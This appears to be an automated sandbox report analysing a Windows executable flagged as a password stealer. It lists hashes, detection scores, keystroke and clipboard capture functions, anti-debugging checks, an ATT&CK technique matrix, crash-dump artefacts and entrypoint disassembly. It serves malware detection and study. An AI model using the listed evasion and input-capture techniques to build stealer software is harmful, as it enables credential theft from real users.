Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe

Overview

General Information

Sample Name:	SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe
Analysis ID:	756119
MD5:	c852376dda1de89231d5f558255775e0
SHA1:	2377355189c59e6f0d4c8792aa959425585dbc61
SHA256:	2c9d6d1a184ed20ff0667797fe4d182170716fb1b179488979bc33f79a901208
Tags:	exe
Infos:

Detection

Score:	52
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Machine Learning detection for sample

Uses 32bit PE files

One or more processes crash

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to read the PEB

Uses code obfuscation techniques (call, push, ret)

Checks if the current process is being debugged

PE file contains sections with non-standard names

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to read the clipboard data

Found large amount of non-executed APIs

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64

SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe (PID: 5640 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe MD5: C852376DDA1DE89231D5F558255775E0)

WerFault.exe (PID: 5688 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5640 -s 464 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe

ReversingLabs: Detection: 17%

Machine Learning detection for sample

Source: SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe

Joe Sandbox ML: detected

Source: SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe	Code function: 0_2_001B5293 FindFirstFileExW,		0_2_001B5293
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe	Code function: 0_2_001B5347 FindFirstFileExW,FindNextFileW,FindClose,FindClose,		0_2_001B5347

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe

Code function: 0_2_001AB830 GetKeyboardState,

0_2_001AB830

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe

Code function: 0_2_001AACA0 OpenClipboard,GetClipboardData,GlobalLock,GlobalSize,VkKeyScanW,MapVirtualKeyW,GlobalUnlock,CloseClipboard,

0_2_001AACA0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe

Code function: 0_2_001AAA00 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalReAlloc,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_001AAA00

Source: SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5640 -s 464

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe	Code function: 0_2_001A18D0	0_2_001A18D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe	Code function: 0_2_001BA9AA	0_2_001BA9AA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe	Code function: 0_2_001AC4C0	0_2_001AC4C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe	Code function: 0_2_001A34E0	0_2_001A34E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe	Code function: 0_2_001A8E70	0_2_001A8E70

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe

Code function: String function: 001AD900 appears 32 times

Source: SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe

ReversingLabs: Detection: 17%

Source: SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5640 -s 464

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5640

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe	Command line argument: --headless	0_2_001A18D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe	Command line argument: --unix	0_2_001A18D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe	Command line argument: --width	0_2_001A18D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe	Command line argument: --height	0_2_001A18D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe	Command line argument: --signal	0_2_001A18D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe	Command line argument: --server	0_2_001A18D0

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERE76B.tmp

Jump to behavior

Source: classification engine

Classification label: mal52.winEXE@2/4@0/1

Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe

Code function: 0_2_001B5A15 push ecx; ret

0_2_001B5A28

Source: SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe	Static PE information: section name: .00cfg
Source: SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe	Static PE information: section name: .voltbl

Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe

API coverage: 2.2 %

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe	Code function: 0_2_001B5293 FindFirstFileExW,		0_2_001B5293
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe	Code function: 0_2_001B5347 FindFirstFileExW,FindNextFileW,FindClose,FindClose,		0_2_001B5347

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe

Code function: 0_2_001AD72C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_001AD72C

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe	Code function: 0_2_001B009E mov ecx, dword ptr fs:[00000030h]		0_2_001B009E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe	Code function: 0_2_001B418D mov eax, dword ptr fs:[00000030h]		0_2_001B418D

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe

Code function: 0_2_001B258B GetProcessHeap,

0_2_001B258B

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe	Code function: 0_2_001AD720 SetUnhandledExceptionFilter,	0_2_001AD720
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe	Code function: 0_2_001ADC2D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_001ADC2D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe	Code function: 0_2_001AD72C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_001AD72C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe	Code function: 0_2_001B37DA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_001B37DA

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe

Code function: 0_2_001AD945 cpuid

0_2_001AD945

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe

Code function: 0_2_001AD5D2 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_001AD5D2

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Command and Scripting Interpreter	Path Interception	1 Process Injection	1 Virtualization/Sandbox Evasion	11 Input Capture	1 System Time Discovery	Remote Services	11 Input Capture	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Process Injection	LSASS Memory	3 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	2 Clipboard Data	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	2 Obfuscated Files or Information	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	12 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe	17%	ReversingLabs	Win32.Trojan.Convagent
SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe	100%	Joe Sandbox ML

Domains and IPs

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	756119
Start date and time:	2022-11-29 16:55:10 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal52.winEXE@2/4@0/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 99.9% (good quality ratio 78.4%) Quality average: 66.9% Quality standard deviation: 40.2%
HCA Information:	Successful, ratio: 100% Number of executed functions: 5 Number of non-executed functions: 45
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.65.92
Excluded domains from analysis (whitelisted): fs.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, watson.telemetry.microsoft.com
Not all processes where analyzed, report is missing behavior information

Joe Sandbox View / Context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_SecuriteInfo.com_c136f9839aaccad85a66b9f733bbb3cf4c588e0_e9cd6a7e_166ff3ee\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8714732038462919
Encrypted:	false
SSDEEP:	96:QrxoFzqgLj9UhO9e77f5pXIQcQvc6QcEDMcw3Diji+HbHg/EFAeugtYsaV9w72nx:1nmHBUZMXojNPq/u7s+S274ItQ
MD5:	EB7FC93BB3263EEB66BA489D43CB51AD
SHA1:	B3A0BA916F954B0DA8AE7AC539303176757C0642
SHA-256:	520926A637841923CCE32BB1A6238FAF87C40CAA2C76269E05F42C05D47440CF
SHA-512:	96E789C2DF929CB4A656C630E7E99CCA9242930E1584EFF0EF56EDA9AE30FDBB975A9B198406866AD5A92C45274C9B087BB8CEC91A678BFABC21085094F46821
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.4.2.4.3.3.7.1.5.1.5.8.9.9.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.1.4.2.4.3.3.7.2.7.1.9.0.1.4.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.2.0.e.a.6.5.e.-.3.6.2.c.-.4.6.b.3.-.b.3.6.9.-.3.3.c.c.1.4.1.d.9.6.8.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.3.e.4.9.b.a.4.-.c.5.9.b.-.4.8.b.8.-.8.6.b.e.-.9.d.8.4.f.f.7.5.9.7.1.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...W.i.n.3.2...P.W.S.X.-.g.e.n...1.6.1.8.8...7.0.9.4...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.0.8.-.0.0.0.1.-.0.0.1.a.-.0.3.9.2.-.d.d.8.8.5.6.0.4.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.0.a.9.7.e.b.e.a.e.1.0.7.0.8.9.f.8.7.4.8.f.e.7.8.a.7.a.a.a.3.8.0.0.0.0.f.f.f.f.!.0.0.0.0.2.3.7.7.3.5.5.1.8.9.c.5.9.e.6.f.0.d.4.c.8.7.9.2.a.a.9.5.9.4.2.5.5.8.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE76B.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed Nov 30 00:56:12 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	40616
Entropy (8bit):	2.003000119461151
Encrypted:	false
SSDEEP:	192:ghhUkWXpDiOcgjV+T71PyznTM89xyc62DujPpIYtn:+6hcY+T7ZyzTN92PSCn
MD5:	3BCFE29C334432700B094F1FC88DD0F6
SHA1:	F9E2D5799A2FB03010AA8C16F46FEBF8F3C27E35
SHA-256:	3CCC35DB1139D794A77C61519F9A8BA09A7E97D3E054B8EE70BB1C089D482F7B
SHA-512:	71D099A9DAAA3DC006D4C225FF1DB28D99CD91A4F188CEAE81382F0644DBCAD0D0A4DE3C41AF371E566CF5D82B8908C7E53C83C24954387A6CCEBE7F816D40E3
Malicious:	false
Reputation:	low
Preview:	MDMP....... .......,..c.........................................&..........T.......8...........T........................... ................................................................................U...........B..............GenuineIntelW...........T...........)..c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREA98.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8482
Entropy (8bit):	3.6979070914958747
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiFI6hXx5dv6YqASUMegmfIS0Cpr+89bx9UsfXzlm:RrlsNiq6hXx5dv6YNSUMegmfISbx9Hf0
MD5:	9A0987CA0C23DC8894104FD280D1C9CB
SHA1:	86A49E082370B17C4C9386B5008FB580BA8A221F
SHA-256:	4F9BF8E8B553A8DF0B80CBABBEB310193F14D9078FE513BC294342397ECC9F8A
SHA-512:	346E611884A82B1D470D45296F60A9BB7AE881CAE125D542E974A994B3CBB237CC79B3A5FAE9C54F36E2BADD51DF57EBBA60367B4394F962A84C72582437516B
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.6.4.0.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREB55.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4787
Entropy (8bit):	4.559141635088195
Encrypted:	false
SSDEEP:	48:cvIwSD8zsFJgtWI9f3Wgc8sqYji8fm8M4JEwTZWaFlB+q81LG/tiE3P9zWz/d:uITffwGgrsqYLJTB/nZ0/d
MD5:	955A54B626D1F0F1007DAAB9D2C55C57
SHA1:	9E2662E1C47A4A13C8D82BCB94D0395F91FEB409
SHA-256:	CDBCCAAC3A30A680FE826E60D0A549404F4161ECC925EEC1A1462371F4602A86
SHA-512:	AEF3C0DCBED91B7CEFE5ADF0B78FB7CC5075D9032BA452C27936693A929CA8D28B47F614A73D0CDFA6F71B41C246D94A9C95658FD5D87BCC6942ECBA7F616B36
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1802046" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.182857922109804
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe
File size:	147968
MD5:	c852376dda1de89231d5f558255775e0
SHA1:	2377355189c59e6f0d4c8792aa959425585dbc61
SHA256:	2c9d6d1a184ed20ff0667797fe4d182170716fb1b179488979bc33f79a901208
SHA512:	35734b4b784630927e4da3cd2ffa69e664bdd0cedce1bfe7e8bc6f0c35b0f06174c05f553c4dd84b4843d257bc46892a9226ff6f719ff6fdcb06dd23fff8bb80
SSDEEP:	3072:8OPPLcLPR2kaQ+nYwZbBPUxRC/akBYcgVg7JkWmjwaY4YFOnJKwy:8iLcLPRi/xB8gFLm8oJKd
TLSH:	41E33B11B0C2C0B7C76724B301E796FB3A39B7219B615DDF5B580E686B395E0A630A37
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......c............................,.............@.......................................@........................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0x40d32c
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6385E3E9 [Tue Nov 29 10:50:17 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	8644442967ce2e1b40266fb36e00cd91

Entrypoint Preview

Instruction
call 00007F6A10CB93DBh
jmp 00007F6A10CB8FFFh
push ebp
mov ebp, esp
push dword ptr [ebp+08h]
call 00007F6A10CB918Fh
neg eax
pop ecx
sbb eax, eax
neg eax
dec eax
pop ebp
ret
push ebp
mov ebp, esp
cmp dword ptr [00425A60h], FFFFFFFFh
push dword ptr [ebp+08h]
jne 00007F6A10CB9189h
call 00007F6A10CBC612h
jmp 00007F6A10CB918Dh
push 00425A60h
call 00007F6A10CBC595h
pop ecx
neg eax
pop ecx
sbb eax, eax
not eax
and eax, dword ptr [ebp+08h]
pop ebp
ret
push 00000008h
push 00422EA8h
call 00007F6A10CB9701h
and dword ptr [ebp-04h], 00000000h
mov eax, 00005A4Dh
cmp word ptr [00400000h], ax
jne 00007F6A10CB91DFh
mov eax, dword ptr [0040003Ch]
cmp dword ptr [eax+00400000h], 00004550h
jne 00007F6A10CB91CEh
mov ecx, 0000010Bh
cmp word ptr [eax+00400018h], cx
jne 00007F6A10CB91C0h
mov eax, dword ptr [ebp+08h]
mov ecx, 00400000h
sub eax, ecx
push eax
push ecx
call 00007F6A10CB9302h
pop ecx
pop ecx
test eax, eax
je 00007F6A10CB91A9h
cmp dword ptr [eax+24h], 00000000h
jl 00007F6A10CB91A3h
mov dword ptr [ebp-04h], FFFFFFFEh
mov al, 01h
jmp 00007F6A10CB91A1h
mov eax, dword ptr [ebp-14h]
mov eax, dword ptr [eax]
xor ecx, ecx
cmp dword ptr [eax], C0000005h
sete cl
mov eax, ecx
ret
mov esp, dword ptr [ebp-18h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
